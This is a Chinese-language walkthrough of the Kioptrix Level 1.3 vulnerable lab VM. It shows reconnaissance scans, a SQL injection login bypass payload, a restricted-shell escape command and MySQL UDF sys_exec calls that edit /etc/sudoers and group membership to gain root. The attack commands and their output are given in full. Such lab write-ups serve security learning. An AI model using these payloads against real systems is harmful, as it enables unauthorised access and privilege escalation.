KIOPTRIX: LEVEL 1.3 (#4) 攻略紀錄

前置作業

首先，下載下來的靶機缺vmx檔，無法用vmware開啟，乾脆用KIOPTRIX：LEVEL 1.2 (#3)的vmx檔改一改。在解壓縮後的目錄裡，新增Kioptrix4_vmware.vmx，內容如下:


.encoding = "windows-1252"
config.version = "8"
virtualHW.version = "4"
memsize = "512"
MemAllowAutoScaleDown = "FALSE"
displayName = "KioptrixVM3"
guestOS = "other"
ethernet0.addressType = "generated"
ethernet0.connectionType = "nat"
ide0:0.present = "TRUE"
ide0:0.fileName = "Kioptrix4_vmware.vmdk"
ide1:0.present = "TRUE"
ide1:0.autodetect = "TRUE"
ide1:0.filename = "auto detect"
ide1:0.deviceType = "cdrom-raw"
virtualHW.productCompatibility = "hosted"
numa.autosize.cookie = "10001"
numa.autosize.vcpu.maxPerVirtualNode = "1"
uuid.bios = "56 4d ae 69 93 19 55 ff-ec f1 b6 26 b7 b4 17 66"
uuid.location = "56 4d ae 69 93 19 55 ff-ec f1 b6 26 b7 b4 17 66"
ide0:0.redo = ""
svga.vramSize = "134217728"
vmotion.checkpointFBSize = "134217728"
ethernet0.generatedAddressOffset = "0"
monitor.phys_bits_used = "36"
cleanShutdown = "TRUE"
softPowerOff = "FALSE"
tools.syncTime = "FALSE"
ethernet0.present = "TRUE"
ethernet0.generatedAddress = "00:0c:29:b4:17:66"
toolsInstallManager.updateCounter = "1"
checkpoint.vmState = ""
extendedConfigFile = "Kioptrix4_vmware.vmxf"

0x01 信息收集

1.1 namp掃描

掃描開啟port:

$ nmap -A -T4 192.168.44.132
Starting Nmap 7.92 ( https://nmap.org ) at 2022-10-24 21:03 CST
Nmap scan report for 192.168.44.132
Host is up (0.00058s latency).
Not shown: 566 closed tcp ports (conn-refused), 430 filtered tcp ports (no-response)
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 9b:ad:4f:f2:1e:c5:f2:39:14:b9:d3:a0:0b:e8:41:71 (DSA)
|_  2048 85:40:c6:d5:41:26:05:34:ad:f8:6e:f2:a7:6b:4f:0e (RSA)
80/tcp  open  http        Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
|_http-title: Site doesn't have a title (text/html).
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open  netbios-ssn Samba smbd 3.0.28a (workgroup: WORKGROUP)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Host script results:
|_clock-skew: mean: 9h59m59s, deviation: 2h49m42s, median: 7h59m59s
|_nbstat: NetBIOS name: KIOPTRIX4, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
|_smb2-time: Protocol negotiation failed (SMB2)
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
| smb-os-discovery:
|   OS: Unix (Samba 3.0.28a)
|   Computer name: Kioptrix4
|   NetBIOS computer name:
|   Domain name: localdomain
|   FQDN: Kioptrix4.localdomain
|_  System time: 2022-10-24T17:03:39-04:00

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.87 seconds
Segmentation fault

$ nikto -host 192.168.44.132
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          192.168.44.132
+ Target Hostname:    192.168.44.132
+ Target Port:        80
+ Start Time:         2022-10-24 21:09:33 (GMT8)
---------------------------------------------------------------------------
+ Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch
+ Retrieved x-powered-by header: PHP/5.2.4-2ubuntu5.6
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Apache/2.2.8 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ PHP/5.2.4-2ubuntu5.6 appears to be outdated (current is at least 7.2.12). PHP 5.6.33, 7.0.27, 7.1.13, 7.2.1 may also current release for each branch.
+ Uncommon header 'tcn' found, with contents: list
+ Apache mod_negotiation is enabled with MultiViews, which allows attackers to easily brute force file names. See http://www.wisec.it/sectou.php?id=4698ebdc59d15. The following alternatives for 'index' were found: index.php
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F36-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F34-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-12184: /?=PHPE9568F35-D428-11d2-A769-00AA001ACF42: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ Server may leak inodes via ETags, header found with file /icons/README, inode: 98933, size: 5108, mtime: Tue Aug 28 18:48:10 2007
+ OSVDB-3233: /icons/README: Apache default file found.
+ Cookie PHPSESSID created without the httponly flag
+ 8724 requests: 0 error(s) and 19 item(s) reported on remote host
+ End Time:           2022-10-24 21:09:45 (GMT8) (12 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

看到是80 port，就先登進網頁。

1.2 目錄遍歷

接下來爆破目錄，用dirb。

$ dirb http://192.168.44.132

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon Oct 24 21:46:15 2022
URL_BASE: http://192.168.44.132/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.44.132/ ----
+ http://192.168.44.132/cgi-bin/ (CODE:403|SIZE:329)
==> DIRECTORY: http://192.168.44.132/images/
+ http://192.168.44.132/index (CODE:200|SIZE:1255)
+ http://192.168.44.132/index.php (CODE:200|SIZE:1255)
==> DIRECTORY: http://192.168.44.132/john/
+ http://192.168.44.132/logout (CODE:302|SIZE:0)
+ http://192.168.44.132/member (CODE:302|SIZE:220)
+ http://192.168.44.132/server-status (CODE:403|SIZE:334)

---- Entering directory: http://192.168.44.132/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://192.168.44.132/john/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

可以發現有一個john，實際連進去後:

但點john.php後又回到登入畫面，所以先嘗試對登入頁面的帳密用SQL injection攻擊。

0x02 漏洞探測

嘗試一下後，發現如果密碼輸入單引號，會出現如下的sql錯誤:

**Warning**: mysql_num_rows(): supplied argument is not a valid MySQL result resource in **/var/www/checklogin.php** on line **28**

而不只是出現Wrong Username or Password，代表密碼欄位存在SQL injection攻擊漏洞，不過帳號欄位打單引號只會Wrong Username or Password。

帳號用john，密碼則是用 ' or 1=1 #，登入畫面如下:

0x03 Get Shell

既然給出了帳號跟明顯是明文的密碼，就直接SSH登入看看吧。

$ ssh -oHostKeyAlgorithms=+ssh-dss john@192.168.44.132
The authenticity of host '192.168.44.132 (192.168.44.132)' can't be established.
DSA key fingerprint is SHA256:l2Z9xv+mXqcandVHZntyNeV1loP8XoFca+R/2VbroAw.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.44.132' (DSA) to the list of known hosts.
john@192.168.44.132's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands

如果輸入help指令，可以發現只能使用一些指令:

john:~$ help
cd  clear  echo  exit  help  ll  lpath  ls

所以需要讓這個帳號可以用多一點指令，可以參考以下這一篇:

How to Escape Restricted Shell Environments on Linux « Null Byte :: WonderHowTo

總之，因為可以用echo，所以我們使用如下指令使得可以使用大部分指令:

john:~$ echo os.system('/bin/bash')
john@Kioptrix4:~$

0x04 提權

提權思路: 1.更改相關文件(\etc\passwd、\etc\sudoer)2.利用現有攻擊腳本3. MySQL提權

如何知道這是MySQL? 剛剛在試SQL injection時，錯誤訊息就已經提示了是MySQL。

不過想利用MySQL提權，首先得知道資料庫帳號密碼。 linux目錄下有個目錄：/var/www/html，把文件放到這個目錄下就可以通過IP很方便的訪問，所以之前懷疑的john.php可能會在裡面。那麼，總之先切換目錄:

john@Kioptrix4:~$ pwd
/home/john
john@Kioptrix4:~$ cd ..
john@Kioptrix4:/home$ cd ..
john@Kioptrix4:/$ pwd
/
john@Kioptrix4:/$ cd /var/www
john@Kioptrix4:/var/www$ ls
checklogin.php  database.sql  images  index.php  john  login_success.php  logout.php  member.php  robert
john@Kioptrix4:/var/www$ cd john/
john@Kioptrix4:/var/www/john$ ls
john.php
john@Kioptrix4:/var/www/john$ cat john.php
<?php
session_start();
if(!session_is_registered(myusername)){
        header("location:../index.php");
}else{
ob_start();
$host="localhost"; // Host name
$username="root"; // Mysql username
$password=""; // Mysql password
$db_name="members"; // Database name
$tbl_name="members"; // Table name

// Connect to server and select databse.
mysql_connect("$host", "$username", "$password")or die("cannot connect");
mysql_select_db("$db_name")or die("cannot select DB");

$result=mysql_query("SELECT * FROM $tbl_name WHERE username='".$_SESSION['myusername']."'");

// Mysql_num_row is counting table row
$count=mysql_num_rows($result);
// If result matched $myusername and $mypassword, table row must be 1 row

if($count!=0){
        $row = mysql_fetch_array($result);
}
else {
echo "Something went wrong";
}

ob_end_flush();

?>

<html><body>
<table width="500" border="0" align="center" cellpadding="0" cellspacing="1" bgcolor="#CCCCCC">
        <tr>
                <td>
                        <table width="100%" border="0" cellpadding="3" cellspacing="1" bgcolor="#FFFFFF">
                                <tr>
                                        <td align="center"  colspan="3"><strong>Member's Control Panel </strong></td>
                                </tr>
                                <tr>
                                        <td width="30">Username</td>
                                        <td width="6">:</td>
                                        <td width="464"><?php print ($row[1]);?></td>
                                </tr>
                                <tr>
                                        <td width="30">Password</td>
                                        <td width="6">:</td>
                                        <td width="464"><?php print($row[2]);?></td>
                                </tr>
                                <tr>
                                        <td>&nbsp;
                                        <form method="link" action="logout.php">
                                        <input type=submit value="Logout">
                                        </form>
                                        </td>
                                        <td>&nbsp;</td>
                                </tr>
                        </table>
                </td>
        </tr>
</table>
</body></html>

<?php
}
?>

在實際查看了john.php後，可以發現下面兩行:

$username="root"; // Mysql username
$password=""; // Mysql password

這代表root這個user的密碼根本是空的，所以直接用root登入，密碼不用打:

john@Kioptrix4:/var/www/john$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 8
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql>

先看看MySQL版本:

mysql> \s
--------------
mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2

Connection id:          8
Current database:
Current user:           root@localhost
SSL:                    Not in use
Current pager:          stdout
Using outfile:          ''
Using delimiter:        ;
Server version:         5.0.51a-3ubuntu5.4 (Ubuntu)
Protocol version:       10
Connection:             Localhost via UNIX socket
Server characterset:    latin1
Db     characterset:    latin1
Client characterset:    latin1
Conn.  characterset:    latin1
UNIX socket:            /var/run/mysqld/mysqld.sock
Uptime:                 1 hour 22 min 27 sec

Threads: 1  Questions: 38  Slow queries: 0  Opens: 24  Flush tables: 1  Open tables: 18  Queries per second avg: 0.008
--------------

看來是5.0.51a-3ubuntu5.4。

有關資料庫提權，可以看這兩篇:

MySQL提权的三种方法 - FreeBuf网络安全行业门户
 【数据库提权系列】---【Mysql-UDF提权篇】 - FreeBuf网络安全行业门户

簡單來說，linux的mysql資料庫可以用sys_eval或sys_exec拿來執行系統指令，但要先連結到UDF库文件(sqlmap-master\data\udf\mysql\linux\64下的lib_mysqludf_sys.so_文件)。

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| members            |
| mysql              |
+--------------------+
3 rows in set (0.00 sec)

mysql> use mysql;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select * from func;
+-----------------------+-----+---------------------+----------+
| name                  | ret | dl                  | type     |
+-----------------------+-----+---------------------+----------+
| lib_mysqludf_sys_info |   0 | lib_mysqludf_sys.so | function |
| sys_exec              |   0 | lib_mysqludf_sys.so | function |
+-----------------------+-----+---------------------+----------+
2 rows in set (0.00 sec)

mysql> select sys_eval("whoami");
ERROR 1305 (42000): FUNCTION mysql.sys_eval does not exist
mysql> SELECT sys_exec('touch /tmp/test_mysql');
+-----------------------------------+
| sys_exec('touch /tmp/test_mysql') |
+-----------------------------------+
| NULL                              |
+-----------------------------------+

不過從select * from func;這條指令的結果，可以知道已經導入lib_mysqludf_sys.so，所以不需要導入so檔，直接支援sys_exec指令。

為了測試剛剛下的sys_exec指令是否有確實運作，我們實際到tmp資料夾，看看是不是真的有創建文件:

mysql> quit
Bye
john@Kioptrix4:~$ cd /tmp
john@Kioptrix4:/tmp$ ls -l
total 0
-rw-rw---- 1 root root 0 2022-10-29 04:53 test_mysql

可以發現創建出來的文件是root權限。所以可以利用這樣的函式去更動/etc/sudoers文件，創建一個root使用者robert，或是將john帳號添加權限

創建一個root使用者robert:

select sys_exec('echo "robert ALL=(ALL) NOPASSWD: ALL" >> /etc/sudoers');

將john帳號添加權限:

select sys_exec('usermod -a -G admin john');

這裡以第二種方式舉例:

john@Kioptrix4:/tmp$ mysql -u root -p
Enter password:
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 12
Server version: 5.0.51a-3ubuntu5.4 (Ubuntu)

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

mysql> use mysql;
No connection. Trying to reconnect...
Connection id:    1
Current database: *** NONE ***

Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> select sys_exec('usermod -a -G admin john');
ERROR 2006 (HY000): MySQL server has gone away
No connection. Trying to reconnect...
Connection id:    1
Current database: mysql

+--------------------------------------+
| sys_exec('usermod -a -G admin john') |
+--------------------------------------+
| NULL                                 |
+--------------------------------------+
1 row in set (0.05 sec)

再新開一個cmd測試:

$  ssh -oHostKeyAlgorithms=+ssh-dss john@192.168.44.132
john@192.168.44.132's password:
Permission denied, please try again.
john@192.168.44.132's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you  don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ echo os.system('/bin/bash')
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

john@Kioptrix4:~$ sudo su
[sudo] password for john:
root@Kioptrix4:/home/john#

找flag:

root@Kioptrix4:~# locate root
/root
/etc/init.d/checkroot.sh
/etc/init.d/umountroot
/etc/rc0.d/S60umountroot
/etc/rc6.d/S60umountroot
/etc/rcS.d/S20checkroot.sh
/lib/security/pam_rootok.so
/root/.bash_history
/root/.bashrc
/root/.lhistory
/root/.mysql_history
/root/.nano_history
/root/.profile
/root/.ssh
/root/congrats.txt
/root/lshell-0.9.12
/root/.ssh/known_hosts
/root/lshell-0.9.12/CHANGES
/root/lshell-0.9.12/COPYING
/root/lshell-0.9.12/MANIFEST.in
/root/lshell-0.9.12/PKG-INFO
/root/lshell-0.9.12/README
/root/lshell-0.9.12/bin
/root/lshell-0.9.12/build
/root/lshell-0.9.12/etc
/root/lshell-0.9.12/lshell.spec
/root/lshell-0.9.12/lshellmodule
/root/lshell-0.9.12/man
/root/lshell-0.9.12/setup.py
/root/lshell-0.9.12/test
/root/lshell-0.9.12/bin/lshell
/root/lshell-0.9.12/build/lib
/root/lshell-0.9.12/build/scripts-2.5
/root/lshell-0.9.12/build/lib/lshell.py
/root/lshell-0.9.12/build/scripts-2.5/lshell
/root/lshell-0.9.12/etc/logrotate.d
/root/lshell-0.9.12/etc/lshell.conf
/root/lshell-0.9.12/etc/logrotate.d/lshell
/root/lshell-0.9.12/lshellmodule/lshell.py
/root/lshell-0.9.12/man/lshell.1
/root/lshell-0.9.12/test/test_lshell.py
/sbin/pivot_root
/usr/lib/klibc/bin/chroot
/usr/lib/klibc/bin/pivot_root
/usr/sbin/chroot
/usr/sbin/rootflags
/usr/share/man/man8/chroot.8.gz
/usr/share/man/man8/pam_rootok.8.gz
/usr/share/man/man8/pivot_root.8.gz
/usr/share/man/man8/rootflags.8.gz
/usr/share/man/man8/sudo_root.8.gz
/usr/share/mysql/mysql-test/include/not_as_root.inc
/usr/share/mysql/mysql-test/r/not_as_root.require
/usr/share/recovery-mode/options/root
/var/log/fsck/checkroot

flag的路徑是: /root/congrats.txt。